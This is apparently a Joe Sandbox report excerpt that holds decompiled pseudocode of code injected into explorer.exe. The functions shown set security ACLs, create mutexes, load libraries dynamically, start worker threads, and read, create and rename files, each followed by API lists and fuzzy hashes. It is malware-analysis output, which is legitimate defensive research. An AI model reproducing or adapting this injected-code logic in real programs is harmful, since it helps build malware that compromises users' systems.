        				WCHAR* _t9;
        				intOrPtr _t10;
        				intOrPtr _t11;
        				void* _t22;
        				void* _t32;
        				intOrPtr _t34;
        				intOrPtr _t35;
        				intOrPtr _t41;
        				intOrPtr _t43;
        				intOrPtr _t46;
        				intOrPtr _t49;
        				void* _t51;
        				void* _t53;
        				void* _t56;
        				WCHAR* _t59;
        				signed int _t60;
        				void* _t62;
        				void* _t63;
        				void* _t74;
        
        				_t74 = __fp0;
        				_t34 =  *0x9e778; // 0x133fc08
        				_t62 = (_t60 & 0xfffffff8) - 0x21c;
        				_t51 = 0x31;
        				_t32 = 1; // executed
        				_t9 = E00089ED0(_t34, _t51); // executed
        				if(_t9 != 0) {
        					_t10 =  *0x9e78c; // 0x0
        					_t66 = _t10;
        					if(_t10 == 0) {
        						_t49 =  *0x9e688; // 0xb0000
        						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
        						 *0x9e78c = _t10;
        					}
        					_push(0);
        					_push(_t10);
        					_t11 =  *0x9e688; // 0xb0000
        					_push(L"\\c");
        					_t9 = E000892E5(_t11 + 0x438);
        					_t59 = _t9;
        					_t63 = _t62 + 0x10;
        					_v544 = _t59;
        					if(_t59 != 0) {
        						while(1) {
        							_t35 =  *0x9e688; // 0xb0000
        							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
        							if(_t56 == 0) {
        								break;
        							}
        							if(E0008B269(_t59) == 0) {
        								_t32 = E0008F14F(_t59, 0x1388, _t74);
        							}
        							E0008A4DB(_t56);
        							_t41 =  *0x9e684; // 0x133f8f0
        							 *((intOrPtr*)(_t41 + 0x30))(_t56);
        							if(_t32 > 0) {
        								E0008980C( &_v544);
        								_t43 =  *0x9e778; // 0x133fc08
        								_t53 = 0x33;
        								if(E00089ED0(_t43, _t53) != 0) {
        									L12:
        									__eflags = E00081C68(_t59, __eflags, _t74);
        									if(__eflags >= 0) {
        										E0008B1B1(_t59, _t53, __eflags, _t74);
        										continue;
        									}
        								} else {
        									_t46 =  *0x9e778; // 0x133fc08
        									_t53 = 0x12;
        									_t22 = E00089ED0(_t46, _t53);
        									_t72 = _t22;
        									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
        										_push(E0008980C(0));
        										E00089640( &_v536, 0x104, L"%s.%u", _t59);
        										_t63 = _t63 + 0x14;
        										MoveFileW(_t59,  &_v536);
        										continue;
        									} else {
        										goto L12;
        									}
        								}
        							}
        							break;
        						}
        						_t9 = E0008861A( &_v544, 0xfffffffe);
        					}
        				}
        				return _t9;
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: FileMove
        • String ID: %s.%u
        • API String ID: 3562171763-1288070821
        • Opcode ID: 18816e49f38be429948ef6d3383d30e391c2da75528b0b403aeef7b17627c66c
        • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
        • Opcode Fuzzy Hash: 18816e49f38be429948ef6d3383d30e391c2da75528b0b403aeef7b17627c66c
        • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E00082AEA() {
        				intOrPtr _v8;
        				signed int _v12;
        				CHAR* _v16;
        				signed int _t16;
        				intOrPtr _t21;
        				intOrPtr _t22;
        				void* _t26;
        				void* _t29;
        				signed int _t31;
        				intOrPtr _t36;
        				CHAR* _t38;
        				intOrPtr _t39;
        				void* _t40;
        
        				_t15 =  *0x9e710 * 0x64;
        				_t39 = 0;
        				_v12 =  *0x9e710 * 0x64;
        				_t16 = E00088604(_t15);
        				_t38 = _t16;
        				_v16 = _t38;
        				if(_t38 != 0) {
        					_t31 =  *0x9e710; // 0x2
        					_t36 = 0;
        					_v8 = 0;
        					if(_t31 == 0) {
        						L9:
        						_push(_t38);
        						E00089F48(0xe); // executed
        						E0008861A( &_v16, _t39);
        						return 0;
        					}
        					_t29 = 0;
        					do {
        						_t21 =  *0x9e714; // 0x133fe78
        						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
        							if(_t39 != 0) {
        								lstrcatA(_t38, "|");
        								_t39 = _t39 + 1;
        							}
        							_t22 =  *0x9e714; // 0x133fe78
        							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
        							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
        							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
        							_t31 =  *0x9e710; // 0x2
        							_t40 = _t40 + 0x18;
        							_t36 = _v8;
        							_t39 = _t39 + _t26;
        						}
        						_t36 = _t36 + 1;
        						_t29 = _t29 + 0x20;
        						_v8 = _t36;
        					} while (_t36 < _t31);
        					goto L9;
        				}
        				return _t16 | 0xffffffff;
        			}

        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeaplstrcat
        • String ID: %u;%u;%u
        • API String ID: 3011335133-2973439046
        • Opcode ID: 7a3fd77245582d844e0d8f1f61c7398da9a49d0849e7c8a4a8e8fb0d67d6490a
        • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
        • Opcode Fuzzy Hash: 7a3fd77245582d844e0d8f1f61c7398da9a49d0849e7c8a4a8e8fb0d67d6490a
        • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 59%
        			E0008BD10() {
        				char _v8;
        				void* _v12;
        				char _v16;
        				short _v20;
        				char _v24;
        				short _v28;
        				char _v32;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				intOrPtr _v44;
        				intOrPtr _v56;
        				intOrPtr _v60;
        				intOrPtr _v64;
        				intOrPtr _v68;
        				intOrPtr _v72;
        				intOrPtr _v76;
        				intOrPtr _v88;
        				intOrPtr _v92;
        				void _v96;
        				intOrPtr _t58;
        				intOrPtr _t61;
        				intOrPtr _t63;
        				intOrPtr _t65;
        				intOrPtr _t67;
        				intOrPtr _t70;
        				intOrPtr _t73;
        				intOrPtr _t77;
        				intOrPtr _t79;
        				intOrPtr _t81;
        				intOrPtr _t85;
        				intOrPtr _t87;
        				signed int _t90;
        				void* _t92;
        				intOrPtr _t93;
        				void* _t98;
        
        				_t90 = 8;
        				_v28 = 0xf00;
        				_v32 = 0;
        				_v24 = 0;
        				memset( &_v96, 0, _t90 << 2);
        				_v20 = 0x100;
        				_push( &_v12);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push(0);
        				_v16 = 0;
        				_push(0);
        				_v8 = 0;
        				_push(1);
        				_v12 = 0;
        				_push( &_v24);
        				_t58 =  *0x9e68c; // 0x133fab8
        				_t98 = 0;
        				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
        					L14:
        					if(_v8 != 0) {
        						_t67 =  *0x9e68c; // 0x133fab8
        						 *((intOrPtr*)(_t67 + 0x10))(_v8);
        					}
        					if(_v12 != 0) {
        						_t65 =  *0x9e68c; // 0x133fab8
        						 *((intOrPtr*)(_t65 + 0x10))(_v12);
        					}
        					if(_t98 != 0) {
        						_t63 =  *0x9e684; // 0x133f8f0
        						 *((intOrPtr*)(_t63 + 0x34))(_t98);
        					}
        					if(_v16 != 0) {
        						_t61 =  *0x9e684; // 0x133f8f0
        						 *((intOrPtr*)(_t61 + 0x34))(_v16);
        					}
        					L22:
        					return _t98;
        				}
        				_v68 = _v12;
        				_t70 =  *0x9e688; // 0xb0000
        				_t92 = 2;
        				_v96 = 0x1fffff;
        				_v92 = 0;
        				_v88 = 3;
        				_v76 = 0;
        				_v72 = 5;
        				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
        					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
        						goto L7;
        					}
        					goto L4;
        				} else {
        					L4:
        					_push( &_v8);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(1);
        					_push(_t92);
        					_push(_t92);
        					_push( &_v32);
        					_t85 =  *0x9e68c; // 0x133fab8
        					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
        						goto L14;
        					} else {
        						_t87 = _v8;
        						if(_t87 != 0) {
        							_push(2);
        							_pop(1);
        							_v64 = 0x1fffff;
        							_v60 = 1;
        							_v56 = 3;
        							_v44 = 0;
        							_v40 = 1;
        							_v36 = _t87;
        						}
        						L7:
        						_push( &_v16);
        						_push(0);
        						_push( &_v96);
        						_t73 =  *0x9e68c; // 0x133fab8
        						_push(1); // executed
        						if( *((intOrPtr*)(_t73 + 8))() != 0) {
        							goto L14;
        						}
        						_t98 = LocalAlloc(0x40, 0x14);
        						if(_t98 == 0) {
        							goto L14;
        						}
        						_t93 =  *0x9e68c; // 0x133fab8
        						_push(1);
        						_push(_t98);
        						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
        							goto L14;
        						}
        						_t77 =  *0x9e68c; // 0x133fab8
        						_push(0);
        						_push(_v16);
        						_push(1);
        						_push(_t98);
        						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
        							goto L14;
        						}
        						if(_v8 != 0) {
        							_t81 =  *0x9e68c; // 0x133fab8
        							 *((intOrPtr*)(_t81 + 0x10))(_v8);
        						}
        						_t79 =  *0x9e68c; // 0x133fab8
        						 *((intOrPtr*)(_t79 + 0x10))(_v12);
        						goto L22;
        					}
        				}
        			}

        APIs
        • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
        • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocEntriesLocal
        • String ID:
        • API String ID: 2146116654-0
        • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
        • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
        • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
        • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 94%
        			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _t45;
        				intOrPtr _t46;
        				intOrPtr _t48;
        				intOrPtr _t49;
        				void* _t52;
        				intOrPtr _t53;
        				intOrPtr _t54;
        				struct _SECURITY_ATTRIBUTES* _t58;
        				intOrPtr _t59;
        				intOrPtr _t61;
        				intOrPtr _t65;
        				intOrPtr _t66;
        				intOrPtr _t67;
        				intOrPtr _t69;
        				struct _SECURITY_ATTRIBUTES* _t73;
        				intOrPtr _t74;
        				intOrPtr _t77;
        				intOrPtr _t78;
        				intOrPtr _t79;
        				intOrPtr _t82;
        				intOrPtr _t83;
        				void* _t86;
        				intOrPtr _t87;
        				intOrPtr _t89;
        				signed int _t92;
        				intOrPtr _t97;
        				intOrPtr _t98;
        				int _t106;
        				intOrPtr _t110;
        				signed int _t112;
        				signed int _t113;
        				void* _t115;
        
        				_push(__ecx);
        				_push(__ecx);
        				_v8 = __edx;
        				_v12 = __ecx;
        				_t77 =  *0x9e76c; // 0x1dc
        				_t73 = 0;
        				if(E0008A4BF(_t77, 0x7530) >= 0) {
        					_t45 =  *0x9e770; // 0x13395a0
        					_t112 = 0;
        					_t106 = 0;
        					do {
        						_t78 =  *((intOrPtr*)(_t106 + _t45));
        						if(_t78 == 0) {
        							L6:
        							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
        								_t113 = _t112 << 5;
        								if(_v8 == _t73) {
        									 *(_t113 + _t45 + 0x10) = _t73;
        									_t46 =  *0x9e770; // 0x13395a0
        									 *(_t113 + _t46 + 0xc) = _t73;
        									L14:
        									_t79 =  *0x9e770; // 0x13395a0
        									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
        									_t48 =  *0x9e770; // 0x13395a0
        									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
        									_t49 = E0008A471(0, 1);
        									_t82 =  *0x9e770; // 0x13395a0
        									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
        									_t83 =  *0x9e770; // 0x13395a0
        									_t30 = _t83 + _t113 + 4; // 0x13395a4
        									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
        									_t53 =  *0x9e770; // 0x13395a0
        									 *(_t113 + _t53) = _t52;
        									_t54 =  *0x9e770; // 0x13395a0
        									_t86 =  *(_t113 + _t54);
        									if(_t86 != 0) {
        										SetThreadPriority(_t86, 0xffffffff);
        										_t87 =  *0x9e770; // 0x13395a0
        										 *0x9e774 =  *0x9e774 + 1;
        										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
        										_t74 =  *0x9e770; // 0x13395a0
        										_t73 = _t74 + _t113;
        									} else {
        										_t59 =  *0x9e684; // 0x133f8f0
        										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
        										_t61 =  *0x9e770; // 0x13395a0
        										_t37 = _t61 + 0xc; // 0x13395ac
        										_t91 = _t37 + _t113;
        										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
        											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
        											_t61 =  *0x9e770; // 0x13395a0
        										}
        										_t92 = 8;
        										memset(_t113 + _t61, 0, _t92 << 2);
        									}
        									L19:
        									_t89 =  *0x9e76c; // 0x1dc
        									E0008A4DB(_t89);
        									_t58 = _t73;
        									L20:
        									return _t58;
        								}
        								_t110 = _a4;
        								_t65 = E00088604(_t110);
        								_t97 =  *0x9e770; // 0x13395a0
        								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
        								_t66 =  *0x9e770; // 0x13395a0
        								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
        									goto L19;
        								}
        								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
        								_t67 =  *0x9e770; // 0x13395a0
        								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
        								_t115 = _t115 + 0xc;
        								goto L14;
        							}
        							goto L7;
        						}
        						_t69 =  *0x9e684; // 0x133f8f0
        						_push(_t73);
        						_push(_t78);
        						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
        							_t45 =  *0x9e770; // 0x13395a0
        							goto L7;
        						}
        						_t98 =  *0x9e770; // 0x13395a0
        						E0008984A(_t106 + _t98, 0);
        						_t45 =  *0x9e770; // 0x13395a0
        						goto L6;
        						L7:
        						_t106 = _t106 + 0x20;
        						_t112 = _t112 + 1;
        					} while (_t106 < 0x1000);
        					goto L19;
        				}
        				_t58 = 0;
        				goto L20;
        			}

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d85dcc44abdee5eb962f219b78c68e4bab4d13c627165069f4ee2b0541897e29
        • Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
        • Opcode Fuzzy Hash: d85dcc44abdee5eb962f219b78c68e4bab4d13c627165069f4ee2b0541897e29
        • Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 27%
        			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
        				intOrPtr _v8;
        				char _v12;
        				intOrPtr _t26;
        				intOrPtr _t27;
        				intOrPtr _t29;
        				intOrPtr _t34;
        				intOrPtr* _t39;
        				void* _t47;
        				intOrPtr _t55;
        				intOrPtr _t58;
        				char _t60;
        
        				_push(__ecx);
        				_push(__ecx);
        				_t50 = _a4;
        				_t60 = 0;
        				_v12 = 0;
        				if(_a4 != 0) {
        					_t47 = E0008A63B(_t50);
        					if(_t47 == 0) {
        						L11:
        						_t26 = 0;
        						L12:
        						L13:
        						return _t26;
        					}
        					_t27 =  *0x9e684; // 0x133f8f0
        					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
        					if(_t58 == 0) {
        						L9:
        						_t29 =  *0x9e684; // 0x133f8f0
        						 *((intOrPtr*)(_t29 + 0x30))(_t47);
        						if(_t60 != 0) {
        							E0008861A( &_v12, 0);
        						}
        						goto L11;
        					}
        					_t4 = _t58 + 1; // 0x1
        					_t34 = E00088604(_t4); // executed
        					_t60 = _t34;
        					_v12 = _t60;
        					if(_t60 == 0) {
        						goto L9;
        					}
        					_a4 = _a4 & 0;
        					_push(0);
        					_v8 = 0;
        					_push( &_a4);
        					_push(_t58);
        					_push(_t60);
        					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
        						if(_a4 == 0) {
        							if(_v8 != _t58) {
        								goto L9;
        							}
        							_t39 = _a8;
        							 *((char*)(_t58 + _t60)) = 0;
        							if(_t39 != 0) {
        								 *_t39 = _t58;
        							}
        							CloseHandle(_t47);
        							_t26 = _t60;
        							goto L12;
        						}
        						_t55 = _v8 + _a4;
        						_a4 = _a4 & 0x00000000;
        						_push(0);
        						_push( &_a4);
        						_v8 = _t55;
        						_push(_t58 - _t55);
        						_push(_t55 + _t60);
        					}
        					goto L9;
        				}
        				_t26 = 0;
        				goto L13;
        			}

        APIs
        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
        • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,0133FD20,00000400), ref: 0008A776
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CloseFileHandleRead
        • String ID:
        • API String ID: 2331702139-0
        • Opcode ID: 701268faecb08c7e662e07772a1ad47cf862077a9b2ff723ed93e566bb39f527
        • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
        • Opcode Fuzzy Hash: 701268faecb08c7e662e07772a1ad47cf862077a9b2ff723ed93e566bb39f527
        • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 76%
        			E0008153B(void* __ecx, void* __edx) {
        				void* _v8;
        				void* _t3;
        				signed int _t4;
        				intOrPtr _t7;
        				signed int _t9;
        				intOrPtr _t10;
        				void* _t24;
        
        				_push(__ecx);
        				_t3 = CreateMutexA(0, 0, 0);
        				 *0x9e6f4 = _t3;
        				if(_t3 == 0) {
        					L11:
        					_t4 = _t3 | 0xffffffff;
        					__eflags = _t4;
        				} else {
        					_t3 = CreateMutexA(0, 0, 0);
        					 *0x9e6dc = _t3;
        					if(_t3 == 0) {
        						goto L11;
        					} else {
        						_t3 = E00081080(0x4ac);
        						_v8 = _t3;
        						if(_t3 == 0) {
        							goto L11;
        						} else {
        							 *0x9e6e8 = E000891A6(_t3, 0);
        							E000885C2( &_v8);
        							_t7 = E00088604(0x100);
        							 *0x9e6f0 = _t7;
        							if(_t7 != 0) {
        								 *0x9e6fc = 0;
        								_t9 = E00088604(0x401);
        								 *0x9e6d4 = _t9;
        								__eflags = _t9;
        								if(_t9 != 0) {
        									__eflags =  *0x9e6c0; // 0x0
        									if(__eflags == 0) {
        										E000915B6(0x88202, 0x8820b);
        									}
        									_push(0x61e);
        									_t24 = 8;
        									_t10 = E0008E1BC(0x9bd28, _t24); // executed
        									 *0x9e6a0 = _t10;
        									_t4 = 0;
        								} else {
        									_push(0xfffffffc);
        									goto L5;
        								}
        							} else {
        								_push(0xfffffffe);
        								L5:
        								_pop(_t4);
        							}
        						}
        					}
        				}
        				return _t4;
        			}

        APIs
        • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
        • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateMutex$AllocateHeap
        • String ID:
        • API String ID: 704353917-0
        • Opcode ID: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
        • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
        • Opcode Fuzzy Hash: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
        • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 44%
        			E0008BC7A(void* __ecx, void* __edx) {
        				char _v8;
        				char _v12;
        				char _v16;
        				char _v20;
        				char _v24;
        				char _t18;
        				intOrPtr _t19;
        				intOrPtr _t27;
        				intOrPtr _t30;
        				intOrPtr _t36;
        				intOrPtr _t38;
        				char _t39;
        
        				_t39 = 0;
        				_t38 =  *0x9e674; // 0x1f8
        				_v8 = 0;
        				_v12 = 0;
        				_v20 = 0;
        				_v16 = 0;
        				_t18 = E000895E1(__ecx, 0x84b);
        				_push(0);
        				_v24 = _t18;
        				_push( &_v8);
        				_push(1);
        				_push(_t18);
        				_t19 =  *0x9e68c; // 0x133fab8, executed
        				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
        					_push( &_v16);
        					_push( &_v12);
        					_push( &_v20);
        					_t27 =  *0x9e68c; // 0x133fab8
        					_push(_v8);
        					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
        						_push(_v12);
        						_t30 =  *0x9e68c; // 0x133fab8
        						_push(0);
        						_push(0);
        						_push(0);
        						_push(0x10);
        						_push(6);
        						_push(_t38); // executed
        						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
        							_t39 = 1;
        						}
        					}
        					_t36 =  *0x9e68c; // 0x133fab8
        					 *((intOrPtr*)(_t36 + 0x10))(_v8);
        				}
        				E000885D5( &_v24);
        				return _t39;
        			}

        APIs
        • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCB1
        • SetSecurityInfo.ADVAPI32(000001F8,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Security$Descriptor$ConvertInfoString
        • String ID:
        • API String ID: 3187949549-0
        • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
        • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
        • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
        • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 47%
        			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
        				char _v8;
        				char _t5;
        				struct HINSTANCE__* _t7;
        				void* _t10;
        				void* _t12;
        				void* _t22;
        				void* _t25;
        
        				_push(__ecx);
        				_t12 = __ecx;
        				_t22 = __edx;
        				_t5 = E000895C7(_a4);
        				_t25 = 0;
        				_v8 = _t5;
        				_push(_t5);
        				if(_a4 != 0x7c3) {
        					_t7 = LoadLibraryA(); // executed
        				} else {
        					_t7 = GetModuleHandleA();
        				}
        				if(_t7 != 0) {
        					_t10 = E0008E171(_t12, _t22, _t7); // executed
        					_t25 = _t10;
        				}
        				E000885C2( &_v8);
        				return _t25;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
        • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID:
        • API String ID: 4133054770-0
        • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
        • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
        • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
        • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 65%
        			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
        				WCHAR* _v8;
        				char _v12;
        				char _v44;
        				char _v564;
        				char _v1084;
        				void* __esi;
        				void* _t23;
        				struct _SECURITY_ATTRIBUTES* _t25;
        				int _t27;
        				char _t32;
        				char _t38;
        				intOrPtr _t39;
        				void* _t40;
        				WCHAR* _t41;
        				void* _t54;
        				char* _t60;
        				char* _t63;
        				void* _t70;
        				WCHAR* _t71;
        				intOrPtr* _t73;
        
        				_t70 = __ecx;
        				_push(__ecx);
        				E0008B700(__edx,  &_v44, __eflags, __fp0);
        				_t52 = _t70;
        				if(E0008BB8D(_t70) == 0) {
        					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
        					_pop(_t54);
        					__eflags = _t23;
        					if(__eflags == 0) {
        						_t71 = E00082C64( &_v1084, __eflags);
        					} else {
        						E0008B012(_t54,  &_v564); // executed
        						_t32 = E0008109A(_t54, 0x375);
        						_push(0);
        						_v12 = _t32;
        						_push( &_v44);
        						_t60 = "\\";
        						_push(_t60);
        						_push(_t32);
        						_push(_t60);
        						_push( &_v564);
        						_push(_t60);
        						_t71 = E000892E5( &_v1084);
        						E000885D5( &_v12);
        					}
        				} else {
        					_t38 = E0008109A(_t52, 0x4e0);
        					 *_t73 = 0x104;
        					_v12 = _t38;
        					_t39 =  *0x9e684; // 0x133f8f0
        					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
        					_t78 = _t40;
        					if(_t40 != 0) {
        						_t41 = E0008109A( &_v564, 0x375);
        						_push(0);
        						_v8 = _t41;
        						_push( &_v44);
        						_t63 = "\\";
        						_push(_t63);
        						_push(_t41);
        						_push(_t63);
        						_t71 = E000892E5( &_v564);
        						E000885D5( &_v8);
        					} else {
        						_t71 = E00082C64( &_v44, _t78);
        					}
        					E000885D5( &_v12);
        				}
        				_v8 = _t71;
        				_t25 = E0008B269(_t71);
        				if(_t25 == 0) {
        					_t27 = CreateDirectoryW(_t71, _t25); // executed
        					if(_t27 == 0 || E0008B269(_t71) == 0) {
        						E0008861A( &_v8, 0xfffffffe);
        						_t71 = _v8;
        					}
        				}
        				return _t71;
        			}

        APIs
        • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateDirectory
        • String ID:
        • API String ID: 4241100979-0
        • Opcode ID: 334b7fb11edf8458ac038dde38966bd3d6edb3cda6ed2f855dcb4e5129f97406
        • Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
